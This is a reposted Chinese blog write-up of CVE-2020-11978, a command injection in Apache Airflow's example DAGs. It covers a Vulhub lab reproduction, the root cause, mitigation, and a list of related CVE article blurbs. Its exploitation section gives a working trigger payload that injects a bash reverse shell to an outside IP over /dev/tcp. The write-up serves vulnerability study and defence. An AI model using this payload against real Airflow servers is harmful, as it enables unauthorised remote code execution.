CVE-2020-11978 Apache Airflow 命令注入漏洞分析與利用

2年前作者：Flying ladybird分類(lèi)：Toy博客閱讀(42)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了CVE-2020-11978 Apache Airflow 命令注入漏洞分析與利用。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

簡(jiǎn)介

漏洞軟件：Apache Airflow
影響版本：<= 1.10.10

環(huán)境

Vulhub 漏洞測(cè)試靶場(chǎng)

復(fù)現(xiàn)步驟

進(jìn)入 /root/vulhub/airflow/CVE-2020-11978/ 目錄
運(yùn)行以下命令啟動(dòng)環(huán)境

# 初始化數(shù)據(jù)庫(kù)
docker compose run airflow-init
# 開(kāi)啟服務(wù)
docker compose up -d

在客戶(hù)端訪(fǎng)問(wèn) server-ip:8080
找到 example_trigger_target_dag 開(kāi)啟 (有向無(wú)環(huán)圖) 后變?yōu)?“On” 狀態(tài)
在這一列的右側(cè)點(diǎn)擊如下按鈕
輸入以下字符后點(diǎn)擊 Trigger 按鈕
點(diǎn)擊完成后 airflow_dag_success_touch_file 文件就會(huì)被創(chuàng)建在 /tmp 目錄下，使用以下命令在容器中進(jìn)行查詢(xún)和驗(yàn)證

原因

默認(rèn)情況下 Airflow Web UI 是未授權(quán)訪(fǎng)問(wèn)的，直接可以登錄，而登錄后，只能查看 DAG 的調(diào)度狀態(tài)等，無(wú)法進(jìn)行更多操作
但 Airflow Web UI 中提供了觸發(fā) DAG 運(yùn)行的功能，以便測(cè)試 DAG，同時(shí) Airflow 為了讓使用者可以快速熟悉其 DAG 開(kāi)發(fā)流程和功能，為了更好的示例這些 DAG 覆蓋了大多的執(zhí)行器
而其中兩個(gè) DAG 組合起來(lái)可觸發(fā)命令注入導(dǎo)致漏洞產(chǎn)生，如下所示，通過(guò)一個(gè)DAG（example_trigger_controller_dag）來(lái)動(dòng)態(tài)的調(diào)用另外一個(gè) DAG（example_trigger_target_dag）

#airflow/example_dags/example_trigger_target_dag.py
1. 1st DAG (example_trigger_controller_dag) 持有一個(gè) TriggerDagRunOperator，它將觸發(fā)第二個(gè) DAG
#airflow/example_dags/example_trigger_controller_dag.py
2. 2nd DAG (example_trigger_target_dag) 它將由第一個(gè) DAG 中的 TriggerDagRunOperator 觸發(fā)

即通過(guò) example_trigger_controller_dag 內(nèi)部定義的 conf={“message”: “Hello World”} 來(lái)觸發(fā) example_trigger_target_dag 中 bash_command=‘echo "Here is the message:’{{ dag_run.conf[“message”] if dag_run else “” }}‘"’ 的運(yùn)行
根據(jù)上面信息可以看出，輸入 dag_run.conf[“message”] 由第一個(gè) DGA 傳遞過(guò)來(lái)的，看起來(lái)無(wú)法控制。而實(shí)際上熟悉下 Airflow 相關(guān)代碼即可發(fā)現(xiàn) Airflow 中 DAG Run 是代表 DAG 及時(shí)實(shí)例化的對(duì)象，而其中 conf 正是用于傳遞參數(shù)的方式， Airflow 提供了多渠道可以修改 conf，包括命令行例如：

airflow dags trigger --conf '{"conf1": "value1"}' example_parametrized_dag

利用

kali 打開(kāi) nc
輸入以下消息并觸發(fā) DAG

#socket 連接
{"message":"'\";bash -i >& /dev/tcp/10.10.1.7/6666 0>&1;#"}

連接成功

緩解

升級(jí)到 1.10.10 版本之后
刪除或者禁用 DAG，可自行刪除或在配置文件中禁用默認(rèn) DAGload_examples=False

參考

Vulhub 漏洞環(huán)境詳情：https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-11978&scoretype=cvssv3
Airflow dag 中的命令注入(csdn)：https://xz.aliyun.com/t/8037

文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-728177.html

到了這里，關(guān)于CVE-2020-11978 Apache Airflow 命令注入漏洞分析與利用的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿，該文觀(guān)點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

Django SQL注入漏洞分析（CVE-2022-28346）
Django 在2022年發(fā)布的安全更新，修復(fù)了在 QuerySet 的 annotate()， aggregate()， extra() 等函數(shù)中存在的 SQL 注入漏洞。 2.2= Django Django 2.2.28?3.2= Django Django 3.2.13?4.0= Django Django 4.0.4 需要使用了 annotate 或者 aggregate 或 extra 方法利用 pycharm 創(chuàng)建一個(gè) python 項(xiàng)目 ? 創(chuàng)建完成項(xiàng)目后在 Setti
2024年02月03日
瀏覽(24)
【高?！緼pache Airflow Spark Provider 任意文件讀取漏洞（CVE-2023-40272）
Apache Airflow Spark Provider是Apache Airflow項(xiàng)目的一個(gè)插件，用于在Airflow中管理和調(diào)度Apache Spark作業(yè)。受影響版本中，在JDBC連接時(shí)，由于沒(méi)有對(duì)conn_prefix參數(shù)做驗(yàn)證，允許輸入\\\"?\\\"來(lái)指定參數(shù)。攻擊者可以通過(guò)構(gòu)造參數(shù)?allowLoadLocalInfile=true連接攻擊者控制的惡意mysql服務(wù)器，讀取Airfl
2024年02月11日
瀏覽(27)
CVE-2022-42889 Apache Commons Text RCE漏洞分析
最近一直在對(duì)剛研發(fā)出來(lái)的自動(dòng)化Web/API漏洞Fuzz的命令行掃描工具進(jìn)行維護(hù)更新（工具地址：https://github.com/StarCrossPortal/scalpel），目前掃描工具已更新至第三個(gè)版本，新增了5條2022年CVE漏洞POC，修復(fù)了例如Content- Type和body類(lèi)型不一致等問(wèn)題。最新版本測(cè)試穩(wěn)定，滿(mǎn)足Web/API的漏洞
2024年02月13日
瀏覽(25)
【高危】Apache Airflow Spark Provider 反序列化漏洞 (CVE-2023-40195)
zhi.oscs1024.com????? 漏洞類(lèi)型反序列化發(fā)現(xiàn)時(shí)間 2023-08-29 漏洞等級(jí) 高危 MPS編號(hào) MPS-qkdx-17bc CVE編號(hào) CVE-2023-40195 漏洞影響廣度廣 OSCS 描述 Apache Airflow Spark Provider是Apache Airflow項(xiàng)目的一個(gè)插件，用于在Airflow中管理和調(diào)度Apache Spark作業(yè)。受影響版本中，由于沒(méi)有對(duì)conn_prefix參
2024年02月10日
瀏覽(29)
漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞
YAML是一種數(shù)據(jù)序列化格式，設(shè)計(jì)用于人類(lèi)的可讀性和與腳本語(yǔ)言的交互。 SnakeYaml是一個(gè)完整的YAML1.1規(guī)范Processor，支持UTF-8/UTF-16，支持Java對(duì)象的序列化/反序列化，支持所有YAML定義的類(lèi)型。 https://github.com/snakeyaml/snakeyaml SnakeYaml通常使用方法如下： new Yaml(new Constructor(TestDataC
2023年04月27日
瀏覽(30)
Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）
Apache Log4j是一個(gè)用于Java的日志記錄庫(kù)，其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼環(huán)境：vulhub 工具下載地址： ysoserial 利用工具生成payload： 1.創(chuàng)建文件進(jìn)入容器內(nèi)部，查看文件創(chuàng)建成功 2.查看反彈的shell 有點(diǎn)
2024年02月11日
瀏覽(37)
Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)
漏洞詳情： Apache Tomcat是美國(guó)阿帕奇（Apache）軟件基金會(huì)的一款輕量級(jí)Web應(yīng)用服務(wù)器。該程序?qū)崿F(xiàn)了對(duì)Servlet和JavaServer Page（JSP）的支持。 Apache Tomcat中的WebSocket存在安全漏洞，該漏洞源于程序沒(méi)有正確驗(yàn)證payload的長(zhǎng)度。攻擊者可利用該漏洞造成拒絕服務(wù)（無(wú)限循環(huán)）。影響版
2024年02月11日
瀏覽(20)
[JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析
在 i春秋的漏洞靶標(biāo)上看見(jiàn)了此漏洞，所以前來(lái)分析一下漏洞原理，比較也是去年 7月的漏洞。漏洞描述：Apache官方發(fā)布安全公告，修復(fù)了一個(gè)存在于Apache Commons Configuration 組件的遠(yuǎn)程代碼執(zhí)行漏洞，漏洞編號(hào)：CVE-2022-33980，漏洞威脅等級(jí)：高危。惡意攻擊者通過(guò)該漏洞，可在
2024年02月15日
瀏覽(22)
CVE-2021-40444分析報(bào)告微軟MHTML遠(yuǎn)程命令執(zhí)行漏洞
2021 年 8 月 21 日，MSTIC 觀(guān)察到一名 Mandiant 員工在社交媒體上發(fā)布的帖子，該員工具有跟蹤 Cobalt Strike Beacon 基礎(chǔ)設(shè)施的經(jīng)驗(yàn)。所寫(xiě)文章重點(diǎn)介紹了一個(gè)于 2021 年 8 月 19 日上傳到 VirusTotal的 Microsoft Word 文檔（SHA-256：3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf）。 MSTIC 對(duì)樣
2024年02月08日
瀏覽(31)
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞
Apache Kafka 的最新更新解決的一個(gè)漏洞是一個(gè)不安全的 Java 反序列化問(wèn)題，可以利用該漏洞通過(guò)身份驗(yàn)證遠(yuǎn)程執(zhí)行代碼。 Apache Kafka 是一個(gè)開(kāi)源分布式事件流平臺(tái)，被數(shù)千家公司用于高性能數(shù)據(jù)管道、流分析、數(shù)據(jù)集成和任務(wù)關(guān)鍵型應(yīng)用程序。超過(guò) 80% 的財(cái)富 100 強(qiáng)公司信任并使
2024年02月12日
瀏覽(19)